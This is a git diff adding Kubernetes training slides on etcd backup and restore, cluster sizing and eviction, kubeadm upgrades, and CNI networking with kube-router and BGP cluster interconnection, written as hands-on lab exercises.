+- Litmus test: how long does it take to deploy a cluster...
+
+  - for a senior engineer?
+
+  - for a new hire?
+
+- Does it require external intervention?
+
+  (e.g. provisioning servers, signing TLS certs...)
+
+---
+
+## Plan B
+
+- Full machine backups of the control plane can help
+
+- If the control plane is in pods (or containers), pay attention to storage drivers
+
+  (if the backup mechanism is not container-aware, the backups can take way more resources than they should, or even be unusable!)
+
+- If the previous sentence worries you:
+
+  **automate the deployment of your clusters!**
+
+---
+
+## Managing our Kubernetes resources
+
+- Ideal scenario:
+
+  - never create a resource directly on a cluster
+
+  - push to a code repository
+
+  - a special branch (`production` or even `master`) gets automatically deployed
+
+- Some folks call this "GitOps"
+
+  (it's the logical evolution of configuration management and infrastructure as code)
+
+---
+
+## GitOps in theory
+
+- What do we keep in version control?
+
+- For very simple scenarios: source code, Dockerfiles, scripts
+
+- For real applications: add resources (as YAML files)
+
+- For applications deployed multiple times: Helm, Kustomize...
+
+  (staging and production count as "multiple times")
+
+---
+
+## GitOps tooling
+
+- Various tools exist (Weave Flux, GitKube...)
+
+- These tools are still very young
+
+- You still need to write YAML for all your resources
+
+- There is no tool to:
+
+  - list *all* resources in a namespace
+
+  - get resource YAML in a canonical form
+
+  - diff YAML descriptions with current state
+
+---
+
+## GitOps in practice
+
+- Start describing your resources with YAML
+
+- Leverage a tool like Kustomize or Helm
+
+- Make sure that you can easily deploy to a new namespace
+
+  (or even better: to a new cluster)
+
+- When tooling matures, you will be ready
+
+---
+
+## Plan B
+
+- What if we can't describe everything with YAML?
+
+- What if we manually create resources and forget to commit them to source control?
+
+- What about global resources, that don't live in a namespace?
+
+- How can we be sure that we saved *everything*?
+
+---
+
+## Backing up etcd
+
+- All objects are saved in etcd
+
+- etcd data should be relatively small
+
+  (and therefore, quick and easy to back up)
+
+- Two options to back up etcd:
+
+  - snapshot the data directory
+
+  - use `etcdctl snapshot`
+
+---
+
+## Making an etcd snapshot
+
+- The basic command is simple:
+  ```bash
+  etcdctl snapshot save <filename>
+  ```
+
+- But we also need to specify:
+
+  - an environment variable to specify that we want etcdctl v3
+
+  - the address of the server to back up
+
+  - the path to the key, certificate, and CA certificate
+    <br/>(if our etcd uses TLS certificates)
+
+---
+
+## Snapshotting etcd on kubeadm
+
+- The following command will work on clusters deployed with kubeadm
+
+  (and maybe others)
+
+- It should be executed on a master node
+
+```bash
+docker run --rm --net host -v $PWD:/vol \
+    -v /etc/kubernetes/pki/etcd:/etc/kubernetes/pki/etcd:ro \
+    -e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
+    etcdctl --endpoints=https://[127.0.0.1]:2379 \
+            --cacert=/etc/kubernetes/pki/etcd/ca.crt \
+            --cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt \
+            --key=/etc/kubernetes/pki/etcd/healthcheck-client.key \
+            snapshot save /vol/snapshot
+```
+
+- It will create a file named `snapshot` in the current directory
+
+---
+
+## How can we remember all these flags?
+
+- Look at the static pod manifest for etcd
+
+  (in `/etc/kubernetes/manifests`)
+
+- The healthcheck probe is calling `etcdctl` with all the right flags 
+  😉👍✌️
+
+- Exercise: write the YAML for a batch job to perform the backup
+
+---
+
+## Restoring an etcd snapshot
+
+- ~~Execute exactly the same command, but replacing `save` with `restore`~~
+
+  (Believe it or not, doing that will *not* do anything useful!)
+
+- The `restore` command does *not* load a snapshot into a running etcd server
+
+- The `restore` command creates a new data directory from the snapshot
+
+  (it's an offline operation; it doesn't interact with an etcd server)
+
+- It will create a new data directory in a temporary container
+
+  (leaving the running etcd node untouched)
+
+---
+
+## When using kubeadm
+
+1. Create a new data directory from the snapshot:
+   ```bash
+   sudo rm -rf /var/lib/etcd
+   docker run --rm -v /var/lib:/var/lib -v $PWD:/vol \
+          -e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
+          etcdctl snapshot restore /vol/snapshot --data-dir=/var/lib/etcd
+   ```
+
+2. Provision the control plane, using that data directory:
+   ```bash
+   sudo kubeadm init \
+        --ignore-preflight-errors=DirAvailable--var-lib-etcd
+   ```
+
+3. Rejoin the other nodes
+
+---
+
+## The fine print
+
+- This only saves etcd state
+
+- It **does not** save persistent volumes and local node data
+
+- Some critical components (like the pod network) might need to be reset
+
+- As a result, our pods might have to be recreated, too
+
+- If we have proper liveness checks, this should happen automatically
+
+---
+
+## More information about etcd backups
+
+- [Kubernetes documentation](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#built-in-snapshot) about etcd backups
+
+- [etcd documentation](https://coreos.com/etcd/docs/latest/op-guide/recovery.html#snapshotting-the-keyspace) about snapshots and restore
+
+- [A good blog post by elastisys](https://elastisys.com/2018/12/10/backup-kubernetes-how-and-why/) explaining how to restore a snapshot
+
+- [Another good blog post by consol labs](https://labs.consol.de/kubernetes/2018/05/25/kubeadm-backup.html) on the same topic
+
+---
+
+## Don't forget ...
+
+- Also back up the TLS information
+
+  (at the very least: CA key and cert; API server key and cert)
+
+- With clusters provisioned by kubeadm, this is in `/etc/kubernetes/pki`
+
+- If you don't:
+
+  - you will still be able to restore etcd state and bring everything back up
+
+  - you will need to redistribute user certificates
+
+.warning[**TLS information is highly sensitive! 
+<br/>Anyone who has it has full access to your cluster!**]
+
+---
+
+## Stateful services
+
+- It's totally fine to keep your production databases outside of Kubernetes
+
+  *Especially if you have only one database server!*
+
+- Feel free to put development and staging databases on Kubernetes
+
+  (as long as they don't hold important data)
+
+- Using Kubernetes for stateful services makes sense if you have *many*
+
+  (because then you can leverage Kubernetes automation)
+
+---
+
+## Snapshotting persistent volumes
+
+- Option 1: snapshot volumes out of band
+
+  (with the API/CLI/GUI of our SAN/cloud/...)
+
+- Option 2: storage system integration
+
+  (e.g. [Portworx](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/) can [create snapshots through annotations](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/snaps-annotations/#taking-periodic-snapshots-on-a-running-pod))
+
+- Option 3: [snapshots through Kubernetes API](https://kubernetes.io/blog/2018/10/09/introducing-volume-snapshot-alpha-for-kubernetes/)
+
+  (now in alpha for a few storage providers: GCE, OpenSDS, Ceph, Portworx)
+
+---
+
+## More backup tools
+
+- [Stash](https://appscode.com/products/stash/)
+
+  back up Kubernetes persistent volumes
+
+- [ReShifter](https://github.com/mhausenblas/reshifter)
+
+  cluster state management
+
+- ~~Heptio Ark~~ [Velero](https://github.com/heptio/velero)
+
+  full cluster backup
+
+- [kube-backup](https://github.com/pieterlange/kube-backup)
+
+  simple scripts to save resource YAML to a git repository
--- a/slides/k8s/cluster-sizing.md
+++ b/slides/k8s/cluster-sizing.md
@@ -0,0 +1,167 @@
+# Cluster sizing
+
+- What happens when the cluster gets full?
+
+- How can we scale up the cluster?
+
+- Can we do it automatically?
+
+- What are other methods to address capacity planning?
+
+---
+
+## When are we out of resources?
+
+- kubelet monitors node resources:
+
+  - memory
+
+  - node disk usage (typically the root filesystem of the node)
+
+  - image disk usage (where container images and RW layers are stored)
+
+- For each resource, we can provide two thresholds:
+
+  - a hard threshold (if it's met, it provokes immediate action)
+
+  - a soft threshold (provokes action only after a grace period)
+
+- Resource thresholds and grace periods are configurable
+
+  (by passing kubelet command-line flags)
+
+---
+
+## What happens then?
+
+- If disk usage is too high:
+
+  - kubelet will try to remove terminated pods
+
+  - then, it will try to *evict* pods
+
+- If memory usage is too high:
+
+  - it will try to evict pods
+
+- The node is marked as "under pressure"
+
+- This temporarily prevents new pods from being scheduled on the node
+
+---
+
+## Which pods get evicted?
+
+- kubelet looks at the pods' QoS and PriorityClass
+
+- First, pods with BestEffort QoS are considered
+
+- Then, pods with Burstable QoS exceeding their *requests*
+
+  (but only if the exceeding resource is the one that is low on the node)
+
+- Finally, pods with Guaranteed QoS, and Burstable pods within their requests
+
+- Within each group, pods are sorted by PriorityClass
+
+- If there are pods with the same PriorityClass, they are sorted by usage excess
+
+  (i.e. the pods whose usage exceeds their requests the most are evicted first)
+
+---
+
+class: extra-details
+
+## Eviction of Guaranteed pods
+
+- *Normally*, pods with Guaranteed QoS should not be evicted
+
+- A chunk of resources is reserved for node processes (like kubelet)
+
+- It is expected that these processes won't use more than this reservation
+
+- If they do use more resources anyway, all bets are off!
+
+- If this happens, kubelet must evict Guaranteed pods to preserve node stability
+
+  (or Burstable pods that are still within their requested usage)
+
+---
+
+## What happens to evicted pods?
+
+- The pod is terminated
+
+- It is marked as `Failed` at the API level
+
+- If the pod was created by a controller, the controller will recreate it
+
+- The pod will be recreated on another node, *if there are resources available!*
+
+- For more details about the eviction process, see:
+
+  - [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction,
+
+  - [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption.
+
+---
+
+## What if there are no resources available?
+
+- Sometimes, a pod cannot be scheduled anywhere:
+
+  - all the nodes are under pressure,
+
+  - or the pod requests more resources than are available
+
+- The pod then remains in `Pending` state until the situation improves
+
+---
+
+## Cluster scaling
+
+- One way to improve the situation is to add new nodes
+
+- This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler)
+
+- The autoscaler will automatically scale up:
+
+  - if there are pods that failed to be scheduled
+
+- The autoscaler will automatically scale down:
+
+  - if nodes have a low utilization for an extended period of time
+
+---
+
+## Restrictions, gotchas ...
+
+- The Cluster Autoscaler only supports a few cloud infrastructures
+
+  (see [here](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for a list)
+
+- The Cluster Autoscaler cannot scale down nodes that have pods using:
+
+  - local storage
+
+  - affinity/anti-affinity rules preventing them from being rescheduled
+
+  - a restrictive PodDisruptionBudget
+
+---
+
+## Other ways to do capacity planning
+
+- "Running Kubernetes without nodes"
+
+- Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or Kiyot can run pods using on-demand resources
+
+  - Virtual Kubelet can leverage e.g. ACI or Fargate to run pods
+
+  - Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod)
+
+- Economic advantage (no wasted capacity)
+
+- Security advantage (stronger isolation between pods)
+
+Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details.
--- a/slides/k8s/cluster-upgrade.md
+++ b/slides/k8s/cluster-upgrade.md
@@ -0,0 +1,309 @@
+# Upgrading clusters
+
+- It's *recommended* to run consistent versions across a cluster
+
+  (mostly to have feature parity and latest security updates)
+
+- It's not *mandatory*
+
+  (otherwise, cluster upgrades would be a nightmare!)
+
+- Components can be upgraded one at a time without problems
+
+---
+
+## Checking what we're running
+
+- It's easy to check the version for the API server
+
+.exercise[
+
+- Log into node `test1`
+
+- Check the version of kubectl and of the API server:
+  ```bash
+  kubectl version
+  ```
+
+]
+
+- In an HA setup with multiple API servers, they can have different versions
+
+- Running the command above multiple times can return different values
+
+---
+
+## Node versions
+
+- It's also easy to check the version of kubelet
+
+.exercise[
+
+- Check node versions (includes kubelet, kernel, container engine):
+  ```bash
+  kubectl get nodes -o wide
+  ```
+
+]
+
+- Different nodes can run different kubelet versions
+
+- Different nodes can run different kernel versions
+
+- Different nodes can run different container engines
+
+---
+
+## Control plane versions
+
+- If the control plane is self-hosted (running in pods), we can check it
+
+.exercise[
+
+- Show image versions for all pods in `kube-system` namespace:
+  ```bash
+    kubectl --namespace=kube-system get pods -o json \
+            | jq -r '
+              .items[]
+              | [.spec.nodeName, .metadata.name]
+                + 
+                (.spec.containers[].image | split(":"))
+              | @tsv
+              ' \
+            | column -t
+  ```
+
+]
+
+---
+
+## What version are we running anyway?
+
+- When I say, "I'm running Kubernetes 1.11", is that the version of:
+
+  - kubectl
+
+  - API server
+
+  - kubelet
+
+  - controller manager
+
+  - something else?
+
+---
+
+## Other versions that are important
+
+- etcd
+
+- kube-dns or CoreDNS
+
+- CNI plugin(s)
+
+- Network controller, network policy controller
+
+- Container engine
+
+- Linux kernel
+
+---
+
+## General guidelines
+
+- To update a component, use whatever was used to install it
+
+- If it's a distro package, update that distro package
+
+- If it's a container or pod, update that container or pod
+
+- If you used configuration management, update with that
+
+---
+
+## Know where your binaries come from
+
+- Sometimes, we need to upgrade *quickly*
+
+  (when a vulnerability is announced and patched)
+
+- If we are using an installer, we should:
+
+  - make sure it's using upstream packages
+
+  - or make sure that whatever packages it uses are current
+
+  - make sure we can tell it to pin specific component versions
+
+---
+
+## In practice
+
+- We are going to update a few cluster components
+
+- We will change the kubelet version on one node
+
+- We will change the version of the API server
+
+- We will work with cluster `test` (nodes `test1`, `test2`, `test3`)
+
+---
+
+## Updating kubelet
+
+- These nodes have been installed using the official Kubernetes packages
+
+- We can therefore use `apt` or `apt-get`
+
+.exercise[
+
+- Log into node `test3`
+
+- View available versions for package `kubelet`:
+  ```bash
+  apt show kubelet -a | grep ^Version
+  ```
+
+- Upgrade kubelet:
+  ```bash
+  apt install kubelet=1.14.2-00
+  ```
+
+]
+
+---
+
+## Checking what we've done
+
+.exercise[
+
+- Log into node `test1`
+
+- Check node versions:
+  ```bash
+  kubectl get nodes -o wide
+  ```
+
+- Create a deployment and scale it to make sure that the node still works
+
+]
+
+---
+
+## Updating the API server
+
+- This cluster has been deployed with kubeadm
+
+- The control plane runs in *static pods*
+
+- These pods are started automatically by kubelet
+
+  (even when kubelet can't contact the API server)
+
+- They are defined in YAML files in `/etc/kubernetes/manifests`
+
+  (this path is set by a kubelet command-line flag)
+
+- kubelet automatically updates the pods when the files are changed
+
+---
+
+## Changing the API server version
+
+- We will edit the YAML file to use a different image version
+
+.exercise[
+
+- Log into node `test1`
+
+- Check API server version:
+  ```bash
+  kubectl version
+  ```
+
+- Edit the API server pod manifest:
+  ```bash
+  sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
+  ```
+
+- Look for the `image:` line, and update it to e.g. `v1.14.0`
+
+]
+
+---
+
+## Checking what we've done
+
+- The API server will be briefly unavailable while kubelet restarts it
+
+.exercise[
+
+- Check the API server version:
+  ```bash
+  kubectl version
+  ```
+
+]
+
+---
+
+## Updating the whole control plane
+
+- As an example, we'll use kubeadm to upgrade the entire control plane
+
+  (note: this is possible only because the cluster was installed with kubeadm)
+
+.exercise[
+
+- Check what will be upgraded:
+  ```bash
+  sudo kubeadm upgrade plan
+  ```
+
+  (Note: kubeadm is confused by our manual upgrade of the API server.
+  <br/>It thinks the cluster is running 1.14.0!)
+
+<!-- ##VERSION## -->
+
+- Perform the upgrade:
+  ```bash
+  sudo kubeadm upgrade apply v1.14.2
+  ```
+
+]
+
+---
+
+## Updating kubelets
+
+- After updating the control plane, we need to update each kubelet
+
+- This requires running a special command on each node, to download the config
+
+  (this config is generated by kubeadm)
+
+.exercise[
+
+- Download the configuration on each node, and upgrade kubelet:
+  ```bash
+    for N in 1 2 3; do
+      ssh test$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
+      ssh test$N sudo apt install kubelet=1.14.2-00
+    done
+  ```
+]
+
+---
+
+## Checking what we've done
+
+- All our nodes should now be updated to version 1.14.2
+
+.exercise[
+
+- Check node versions:
+  ```bash
+  kubectl get nodes -o wide
+  ```
+
+]
--- a/slides/k8s/cni.md
+++ b/slides/k8s/cni.md
@@ -0,0 +1,688 @@
+# The Container Network Interface
+
+- Allows us to decouple network configuration from Kubernetes
+
+- Implemented by *plugins*
+
+- Plugins are executables that will be invoked by kubelet
+
+- Plugins are responsible for:
+
+  - allocating IP addresses for containers
+
+  - configuring the network for containers
+
+- Plugins can be combined and chained when it makes sense
+
+---
+
+## Combining plugins
+
+- Interface could be created by e.g. `vlan` or `bridge` plugin
+
+- IP address could be allocated by e.g. `dhcp` or `host-local` plugin
+
+- Interface parameters (MTU, sysctls) could be tweaked by the `tuning` plugin
+
+The reference plugins are available [here].
+
+Look in each plugin's directory for its documentation.
+
+[here]: https://github.com/containernetworking/plugins/tree/master/plugins
+
+---
+
+## How does kubelet know which plugins to use?
+
+- The plugin (or list of plugins) is set in the CNI configuration
+
+- The CNI configuration is a *single file* in `/etc/cni/net.d`
+
+- If there are multiple files in that directory, the first one is used
+
+  (in lexicographic order)
+
+- That path can be changed with the `--cni-conf-dir` flag of kubelet
+
+---
+
+## CNI configuration in practice
+
+- When we set up the "pod network" (like Calico, Weave...) it ships a CNI configuration
+
+  (and sometimes, custom CNI plugins)
+
+- Very often, that configuration (and plugins) is installed automatically
+
+  (by a DaemonSet featuring an initContainer with hostPath volumes)
+
+- Examples:
+
+  - Calico [CNI config](https://github.com/projectcalico/calico/blob/1372b56e3bfebe2b9c9cbf8105d6a14764f44159/v2.6/getting-started/kubernetes/installation/hosted/calico.yaml#L25)
+    and [volume](https://github.com/projectcalico/calico/blob/1372b56e3bfebe2b9c9cbf8105d6a14764f44159/v2.6/getting-started/kubernetes/installation/hosted/calico.yaml#L219)
+
+  - kube-router [CNI config](https://github.com/cloudnativelabs/kube-router/blob/c2f893f64fd60cf6d2b6d3fee7191266c0fc0fe5/daemonset/generic-kuberouter.yaml#L10)
+    and [volume](https://github.com/cloudnativelabs/kube-router/blob/c2f893f64fd60cf6d2b6d3fee7191266c0fc0fe5/daemonset/generic-kuberouter.yaml#L73)
+
+---
+
+class: extra-details
+
+## Conf vs conflist
+
+- There are two slightly different configuration formats
+
+- Basic configuration format:
+
+  - holds configuration for a single plugin
+  - typically has a `.conf` name suffix
+  - has a `type` string field in the top-most structure
+  - [examples](https://github.com/containernetworking/cni/blob/master/SPEC.md#example-configurations)
+
+- Configuration list format:
+
+  - can hold configuration for multiple (chained) plugins
+  - typically has a `.conflist` name suffix
+  - has a `plugins` list field in the top-most structure
+  - [examples](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration-lists)
+
+---
+
+class: extra-details
+
+## How plugins are invoked
+
+- Parameters are given through environment variables, including:
+
+  - CNI_COMMAND: desired operation (ADD, DEL, CHECK, or VERSION)
+
+  - CNI_CONTAINERID: container ID
+
+  - CNI_NETNS: path to network namespace file
+
+  - CNI_IFNAME: what the network interface should be named
+
+- The network configuration must be provided to the plugin on stdin
+
+  (this avoids race conditions that could happen by passing a file path)
+
+---
+
+## In practice: kube-router
+
+- We are going to set up a new cluster
+
+- For this new cluster, we will use kube-router
+
+- kube-router will provide the "pod network"
+
+  (connectivity with pods)
+
+- kube-router will also provide internal service connectivity
+
+  (replacing kube-proxy)
+
+---
+
+## How kube-router works
+
+- Very simple architecture
+
+- Does not introduce new CNI plugins
+
+  (uses the `bridge` plugin, with `host-local` for IPAM)
+
+- Pod traffic is routed between nodes
+
+  (no tunnel, no new protocol)
+
+- Internal service connectivity is implemented with IPVS
+
+- Can provide pod network and/or internal service connectivity
+
+- kube-router daemon runs on every node
+
+---
+
+## What kube-router does
+
+- Connect to the API server
+
+- Obtain the local node's `podCIDR`
+
+- Inject it into the CNI configuration file
+
+  (we'll use `/etc/cni/net.d/10-kuberouter.conflist`)
+
+- Obtain the addresses of all nodes
+
+- Establish a *full mesh* BGP peering with the other nodes
+
+- Exchange routes over BGP
+
+---
+
+## What's BGP?
+
+- BGP (Border Gateway Protocol) is the protocol used between internet routers
+
+- It [scales](https://www.cidr-report.org/as2.0/)
+  pretty [well](https://www.cidr-report.org/cgi-bin/plota?file=%2fvar%2fdata%2fbgp%2fas2.0%2fbgp-active%2etxt&descr=Active%20BGP%20entries%20%28FIB%29&ylabel=Active%20BGP%20entries%20%28FIB%29&with=step)
+  (it is used to announce the 700k CIDR prefixes of the internet)
+
+- It is spoken by many hardware routers from many vendors
+
+- It also has many software implementations (Quagga, Bird, FRR...)
+
+- Experienced network folks generally know it (and appreciate it)
+
+- It is also used by Calico (another popular network system for Kubernetes)
+
+- Using BGP allows us to interconnect our "pod network" with other systems
+
+---
+
+## The plan
+
+- We'll work in a new cluster (named `kuberouter`)
+
+- We will run a simple control plane (like before)
+
+- ... But this time, the controller manager will allocate `podCIDR` subnets
+
+  (so that we don't have to manually assign subnets to individual nodes)
+
+- We will create a DaemonSet for kube-router
+
+- We will join nodes to the cluster
+
+- The DaemonSet will automatically start a kube-router pod on each node
+
+---
+
+## Logging into the new cluster
+
+.exercise[
+
+- Log into node `kuberouter1`
+
+- Clone the workshop repository:
+  ```bash
+  git clone https://@@GITREPO@@
+  ```
+
+- Move to this directory:
+  ```bash
+  cd container.training/compose/kube-router-k8s-control-plane
+  ```
+
+]
+
+---
+
+## Our control plane
+
+- We will use a Compose file to start the control plane
+
+- It is similar to the one we used with the `kubenet` cluster
+
+- The API server is started with `--allow-privileged`
+
+  (because we will start kube-router in privileged pods)
+
+- The controller manager is started with extra flags too:
+
+  `--allocate-node-cidrs` and `--cluster-cidr`
+
+- We need to edit the Compose file to set the Cluster CIDR
+
+---
+
+## Starting the control plane
+
+- Our cluster CIDR will be `10.C.0.0/16`
+
+  (where `C` is our cluster number)
+
+.exercise[
+
+- Edit the Compose file to set the Cluster CIDR:
+  ```bash
+  vim docker-compose.yaml
+  ```
+
+- Start the control plane:
+  ```bash
+  docker-compose up
+  ```
+
+]
+
+---
+
+## The kube-router DaemonSet
+
+- In the same directory, there is a `kuberouter.yaml` file
+
+- It contains the definition for a DaemonSet and a ConfigMap
+
+- Before we load it, we also need to edit it
+
+- We need to indicate the address of the API server
+
+  (because kube-router needs to connect to it to retrieve node information)
+
+---
+
+## Creating the DaemonSet
+
+- The address of the API server will be `http://A.B.C.D:8080`
+
+  (where `A.B.C.D` is the public address of `kuberouter1`, running the control plane)
+
+.exercise[
+
+- Edit the YAML file to set the API server address:
+  ```bash
+  vim kuberouter.yaml
+  ```
+
+- Create the DaemonSet:
+  ```bash
+  kubectl create -f kuberouter.yaml
+  ```
+
+]
+
+Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
+
+---
+
+## Generating the kubeconfig for kubelet
+
+- This is similar to what we did for the `kubenet` cluster
+
+.exercise[
+
+- Generate the kubeconfig file (replacing `X.X.X.X` with the address of `kuberouter1`):
+  ```bash
+    kubectl config set-cluster cni --server http://`X.X.X.X`:8080
+    kubectl config set-context cni --cluster cni
+    kubectl config use-context cni
+    cp ~/.kube/config ~/kubeconfig
+  ```
+
+]
+
+---
+
+## Distributing kubeconfig
+
+- We need to copy that kubeconfig file to the other nodes
+
+.exercise[
+
+- Copy `kubeconfig` to the other nodes:
+  ```bash
+    for N in 2 3; do
+    	scp ~/kubeconfig kuberouter$N:
+    done
+  ```
+
+]
+
+---
+
+## Starting kubelet
+
+- We don't need the `--pod-cidr` option anymore
+
+  (the controller manager will allocate these automatically)
+
+- We need to pass `--network-plugin=cni`
+
+.exercise[
+
+- Join the first node:
+   ```bash
+   sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
+   ```
+
+- Open more terminals and join the other nodes:
+  ```bash
+  ssh kuberouter2 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
+  ssh kuberouter3 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
+  ```
+
+]
+
+---
+
+## Setting up a test
+
+- Let's create a Deployment and expose it with a Service
+
+.exercise[
+
+- Create a Deployment running a web server:
+  ```bash
+  kubectl create deployment web --image=jpetazzo/httpenv
+  ```
+
+- Scale it so that it spans multiple nodes:
+  ```bash
+  kubectl scale deployment web --replicas=5
+  ```
+
+- Expose it with a Service:
+  ```bash
+  kubectl expose deployment web --port=8888
+  ```
+
+]
+
+---
+
+## Checking that everything works
+
+.exercise[
+
+- Get the ClusterIP address for the service:
+  ```bash
+  kubectl get svc web
+  ```
+
+- Send a few requests there:
+  ```bash
+  curl `X.X.X.X`:8888
+  ```
+
+]
+
+Note that if you send multiple requests, they are load-balanced in a round robin manner.
+
+This shows that we are using IPVS (vs. iptables, which picked random endpoints).
+
+---
+
+## Troubleshooting
+
+- What if we need to check that everything is working properly?
+
+.exercise[
+
+- Check the IP addresses of our pods:
+  ```bash
+  kubectl get pods -o wide
+  ```
+
+- Check our routing table:
+  ```bash
+  route -n
+  ip route
+  ```
+
+]
+
+We should see the local pod CIDR connected to `kube-bridge`, and the other nodes' pod CIDRs having individual routes, with each node being the gateway.
+
+---
+
+## More troubleshooting
+
+- We can also look at the output of the kube-router pods
+
+  (with `kubectl logs`)
+
+- kube-router also comes with a special shell that gives lots of useful info
+
+  (we can access it with `kubectl exec`)
+
+- But with the current setup of the cluster, these options may not work!
+
+- Why?
+
+---
+
+## Trying `kubectl logs` / `kubectl exec`
+
+.exercise[
+
+- Try to show the logs of a kube-router pod:
+  ```bash
+  kubectl -n kube-system logs ds/kube-router
+  ```
+
+- Or try to exec into one of the kube-router pods:
+  ```bash
+  kubectl -n kube-system exec kube-router-xxxxx bash
+  ```
+
+]
+
+These commands will give an error message that includes:
+```
+dial tcp: lookup kuberouterX on 127.0.0.11:53: no such host
+```
+
+What does that mean?
+
+---
+
+## Internal name resolution
+
+- To execute these commands, the API server needs to connect to kubelet
+
+- By default, it creates a connection using the kubelet's name
+
+  (e.g. `http://kuberouter1:...`)
+
+- This requires our node names to be in DNS
+
+- We can change that by setting a flag on the API server:
+
+  `--kubelet-preferred-address-types=InternalIP`
+
+---
+
+## Another way to check the logs
+
+- We can also ask the container engine directly for the logs
+
+- First, get the container ID, with `docker ps` or like this:
+  ```bash
+  CID=$(docker ps -q \
+        --filter label=io.kubernetes.pod.namespace=kube-system \
+        --filter label=io.kubernetes.container.name=kube-router)
+  ```
+
+- Then view the logs:
+  ```bash
+  docker logs $CID
+  ```
+
+---
+
+class: extra-details
+
+## Other ways to distribute routing tables
+
+- We don't need kube-router and BGP to distribute routes
+
+- The list of nodes (and associated `podCIDR` subnets) is available through the API
+
+- This shell snippet generates the commands to add all required routes on a node:
+
+```bash
+NODES=$(kubectl get nodes -o name | cut -d/ -f2)
+for DESTNODE in $NODES; do
+  if [ "$DESTNODE" != "$HOSTNAME" ]; then
+    echo $(kubectl get node $DESTNODE -o go-template="
+      route add -net {{.spec.podCIDR}} gw {{(index .status.addresses 0).address}}")
+  fi
+done
+```
+
+- This could be useful for embedded platforms with very limited resources
+
+  (or lab environments for learning purposes)
+
+---
+
+# Interconnecting clusters
+
+- We assigned different Cluster CIDRs to each cluster
+
+- This allows us to connect our clusters together
+
+- We will leverage kube-router BGP abilities for that
+
+- We will *peer* each kube-router instance with a *route reflector*
+
+- As a result, we will be able to ping each other's pods
+
+---
+
+## Disclaimers
+
+- There are many methods to interconnect clusters
+
+- Depending on your network implementation, you will use different methods
+
+- The method shown here only works for nodes with direct layer 2 connectivity
+
+- We will often need to use tunnels or other network techniques
+
+---
+
+## The plan
+
+- Someone will start the *route reflector*
+
+  (typically, that will be the person presenting these slides!)
+
+- We will update our kube-router configuration
+
+- We will add a *peering* with the route reflector
+
+  (instructing kube-router to connect to it and exchange route information)
+
+- We should see the routes to other clusters on our nodes
+
+  (in the output of e.g. `route -n` or `ip route show`)
+
+- We should be able to ping pods of other clusters
+
+---
+
+## Starting the route reflector
+
+- Only do this slide if you are doing this on your own
+
+- There is a Compose file in the `compose/frr-route-reflector` directory
+
+- Before continuing, make sure that you have the IP address of the route reflector
+
+---
+
+## Configuring kube-router
+
+- This can be done in two ways:
+
+  - with command-line flags to the `kube-router` process
+
+  - with annotations to Node objects
+
+- We will use the command-line flags
+
+  (because it will automatically propagate to all nodes)
+
+.footnote[Note: with Calico, this is achieved by creating a BGPPeer CRD.]
+
+---
+
+## Updating kube-router configuration
+
+- We need to pass two command-line flags to the kube-router process
+
+.exercise[
+
+- Edit the `kuberouter.yaml` file
+
+- Add the following flags to the kube-router arguments:
+  ```
+  - "--peer-router-ips=`X.X.X.X`"
+  - "--peer-router-asns=64512"
+  ```
+  (Replace `X.X.X.X` with the route reflector address)
+
+- Update the DaemonSet definition:
+  ```bash
+  kubectl apply -f kuberouter.yaml
+  ```
+
+]
+
+---
+
+## Restarting kube-router
+
+- The DaemonSet will not update the pods automatically
+
+  (it is using the default `updateStrategy`, which is `OnDelete`)
+
+- We will therefore delete the pods
+
+  (they will be recreated with the updated definition)
+
+.exercise[
+
+- Delete all the kube-router pods:
+  ```bash
+  kubectl delete pods -n kube-system -l k8s-app=kube-router
+  ```
+
+]
+
+Note: the other `updateStrategy` for a DaemonSet is RollingUpdate.
+<br/>
+For critical services, we might want to precisely control the update process.
+
+---
+
+## Checking peering status
+
+- We can see informative messages in the output of kube-router:
+  ```
+  time="2019-04-07T15:53:56Z" level=info msg="Peer Up"
+  Key=X.X.X.X State=BGP_FSM_OPENCONFIRM Topic=Peer
+  ```
+
+- We should see the routes of the other clusters show up
+
+- For debugging purposes, the reflector also exports a route to 1.0.0.2/32
+
+- That route will show up like this:
+  ```
+  1.0.0.2     172.31.X.Y    255.255.255.255 UGH   0      0        0 eth0
+  ```
+
+- We should be able to ping the pods of other clusters!
+
+---
+
+## If we wanted to do more ...
+
+- kube-router can also export ClusterIP addresses
+
+  (by adding the flag `--advertise-cluster-ip`)
+
+- They are exported individually (as /32)
+
+- This would allow us to easily access other clusters' services
+
+  (without having to resolve the individual addresses of pods)
+
+- Even better if it's combined with DNS integration
+
+  (to facilitate name → ClusterIP resolution)
--- a/slides/k8s/concepts-k8s.md
+++ b/slides/k8s/concepts-k8s.md
@@ -130,6 +130,14 @@ class: pic

 ---

+class: pic
+
+![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
+
+---
+
+class: extra-details
+
 ## Running the control plane on special nodes

 - It is common to reserve a dedicated node for the control plane
@@ -152,6 +160,8 @@ class: pic

 ---

+class: extra-details
+
 ## Running the control plane outside containers

 - The services of the control plane can run in or out of containers
@@ -167,10 +177,12 @@ class: pic

 - In that case, there is no "master node"

-*For this reason, it is more accurate to say "control plane" rather than "master".*
+*For this reason, it is more accurate to say "control plane" rather than "master."*

 ---

+class: extra-details
+
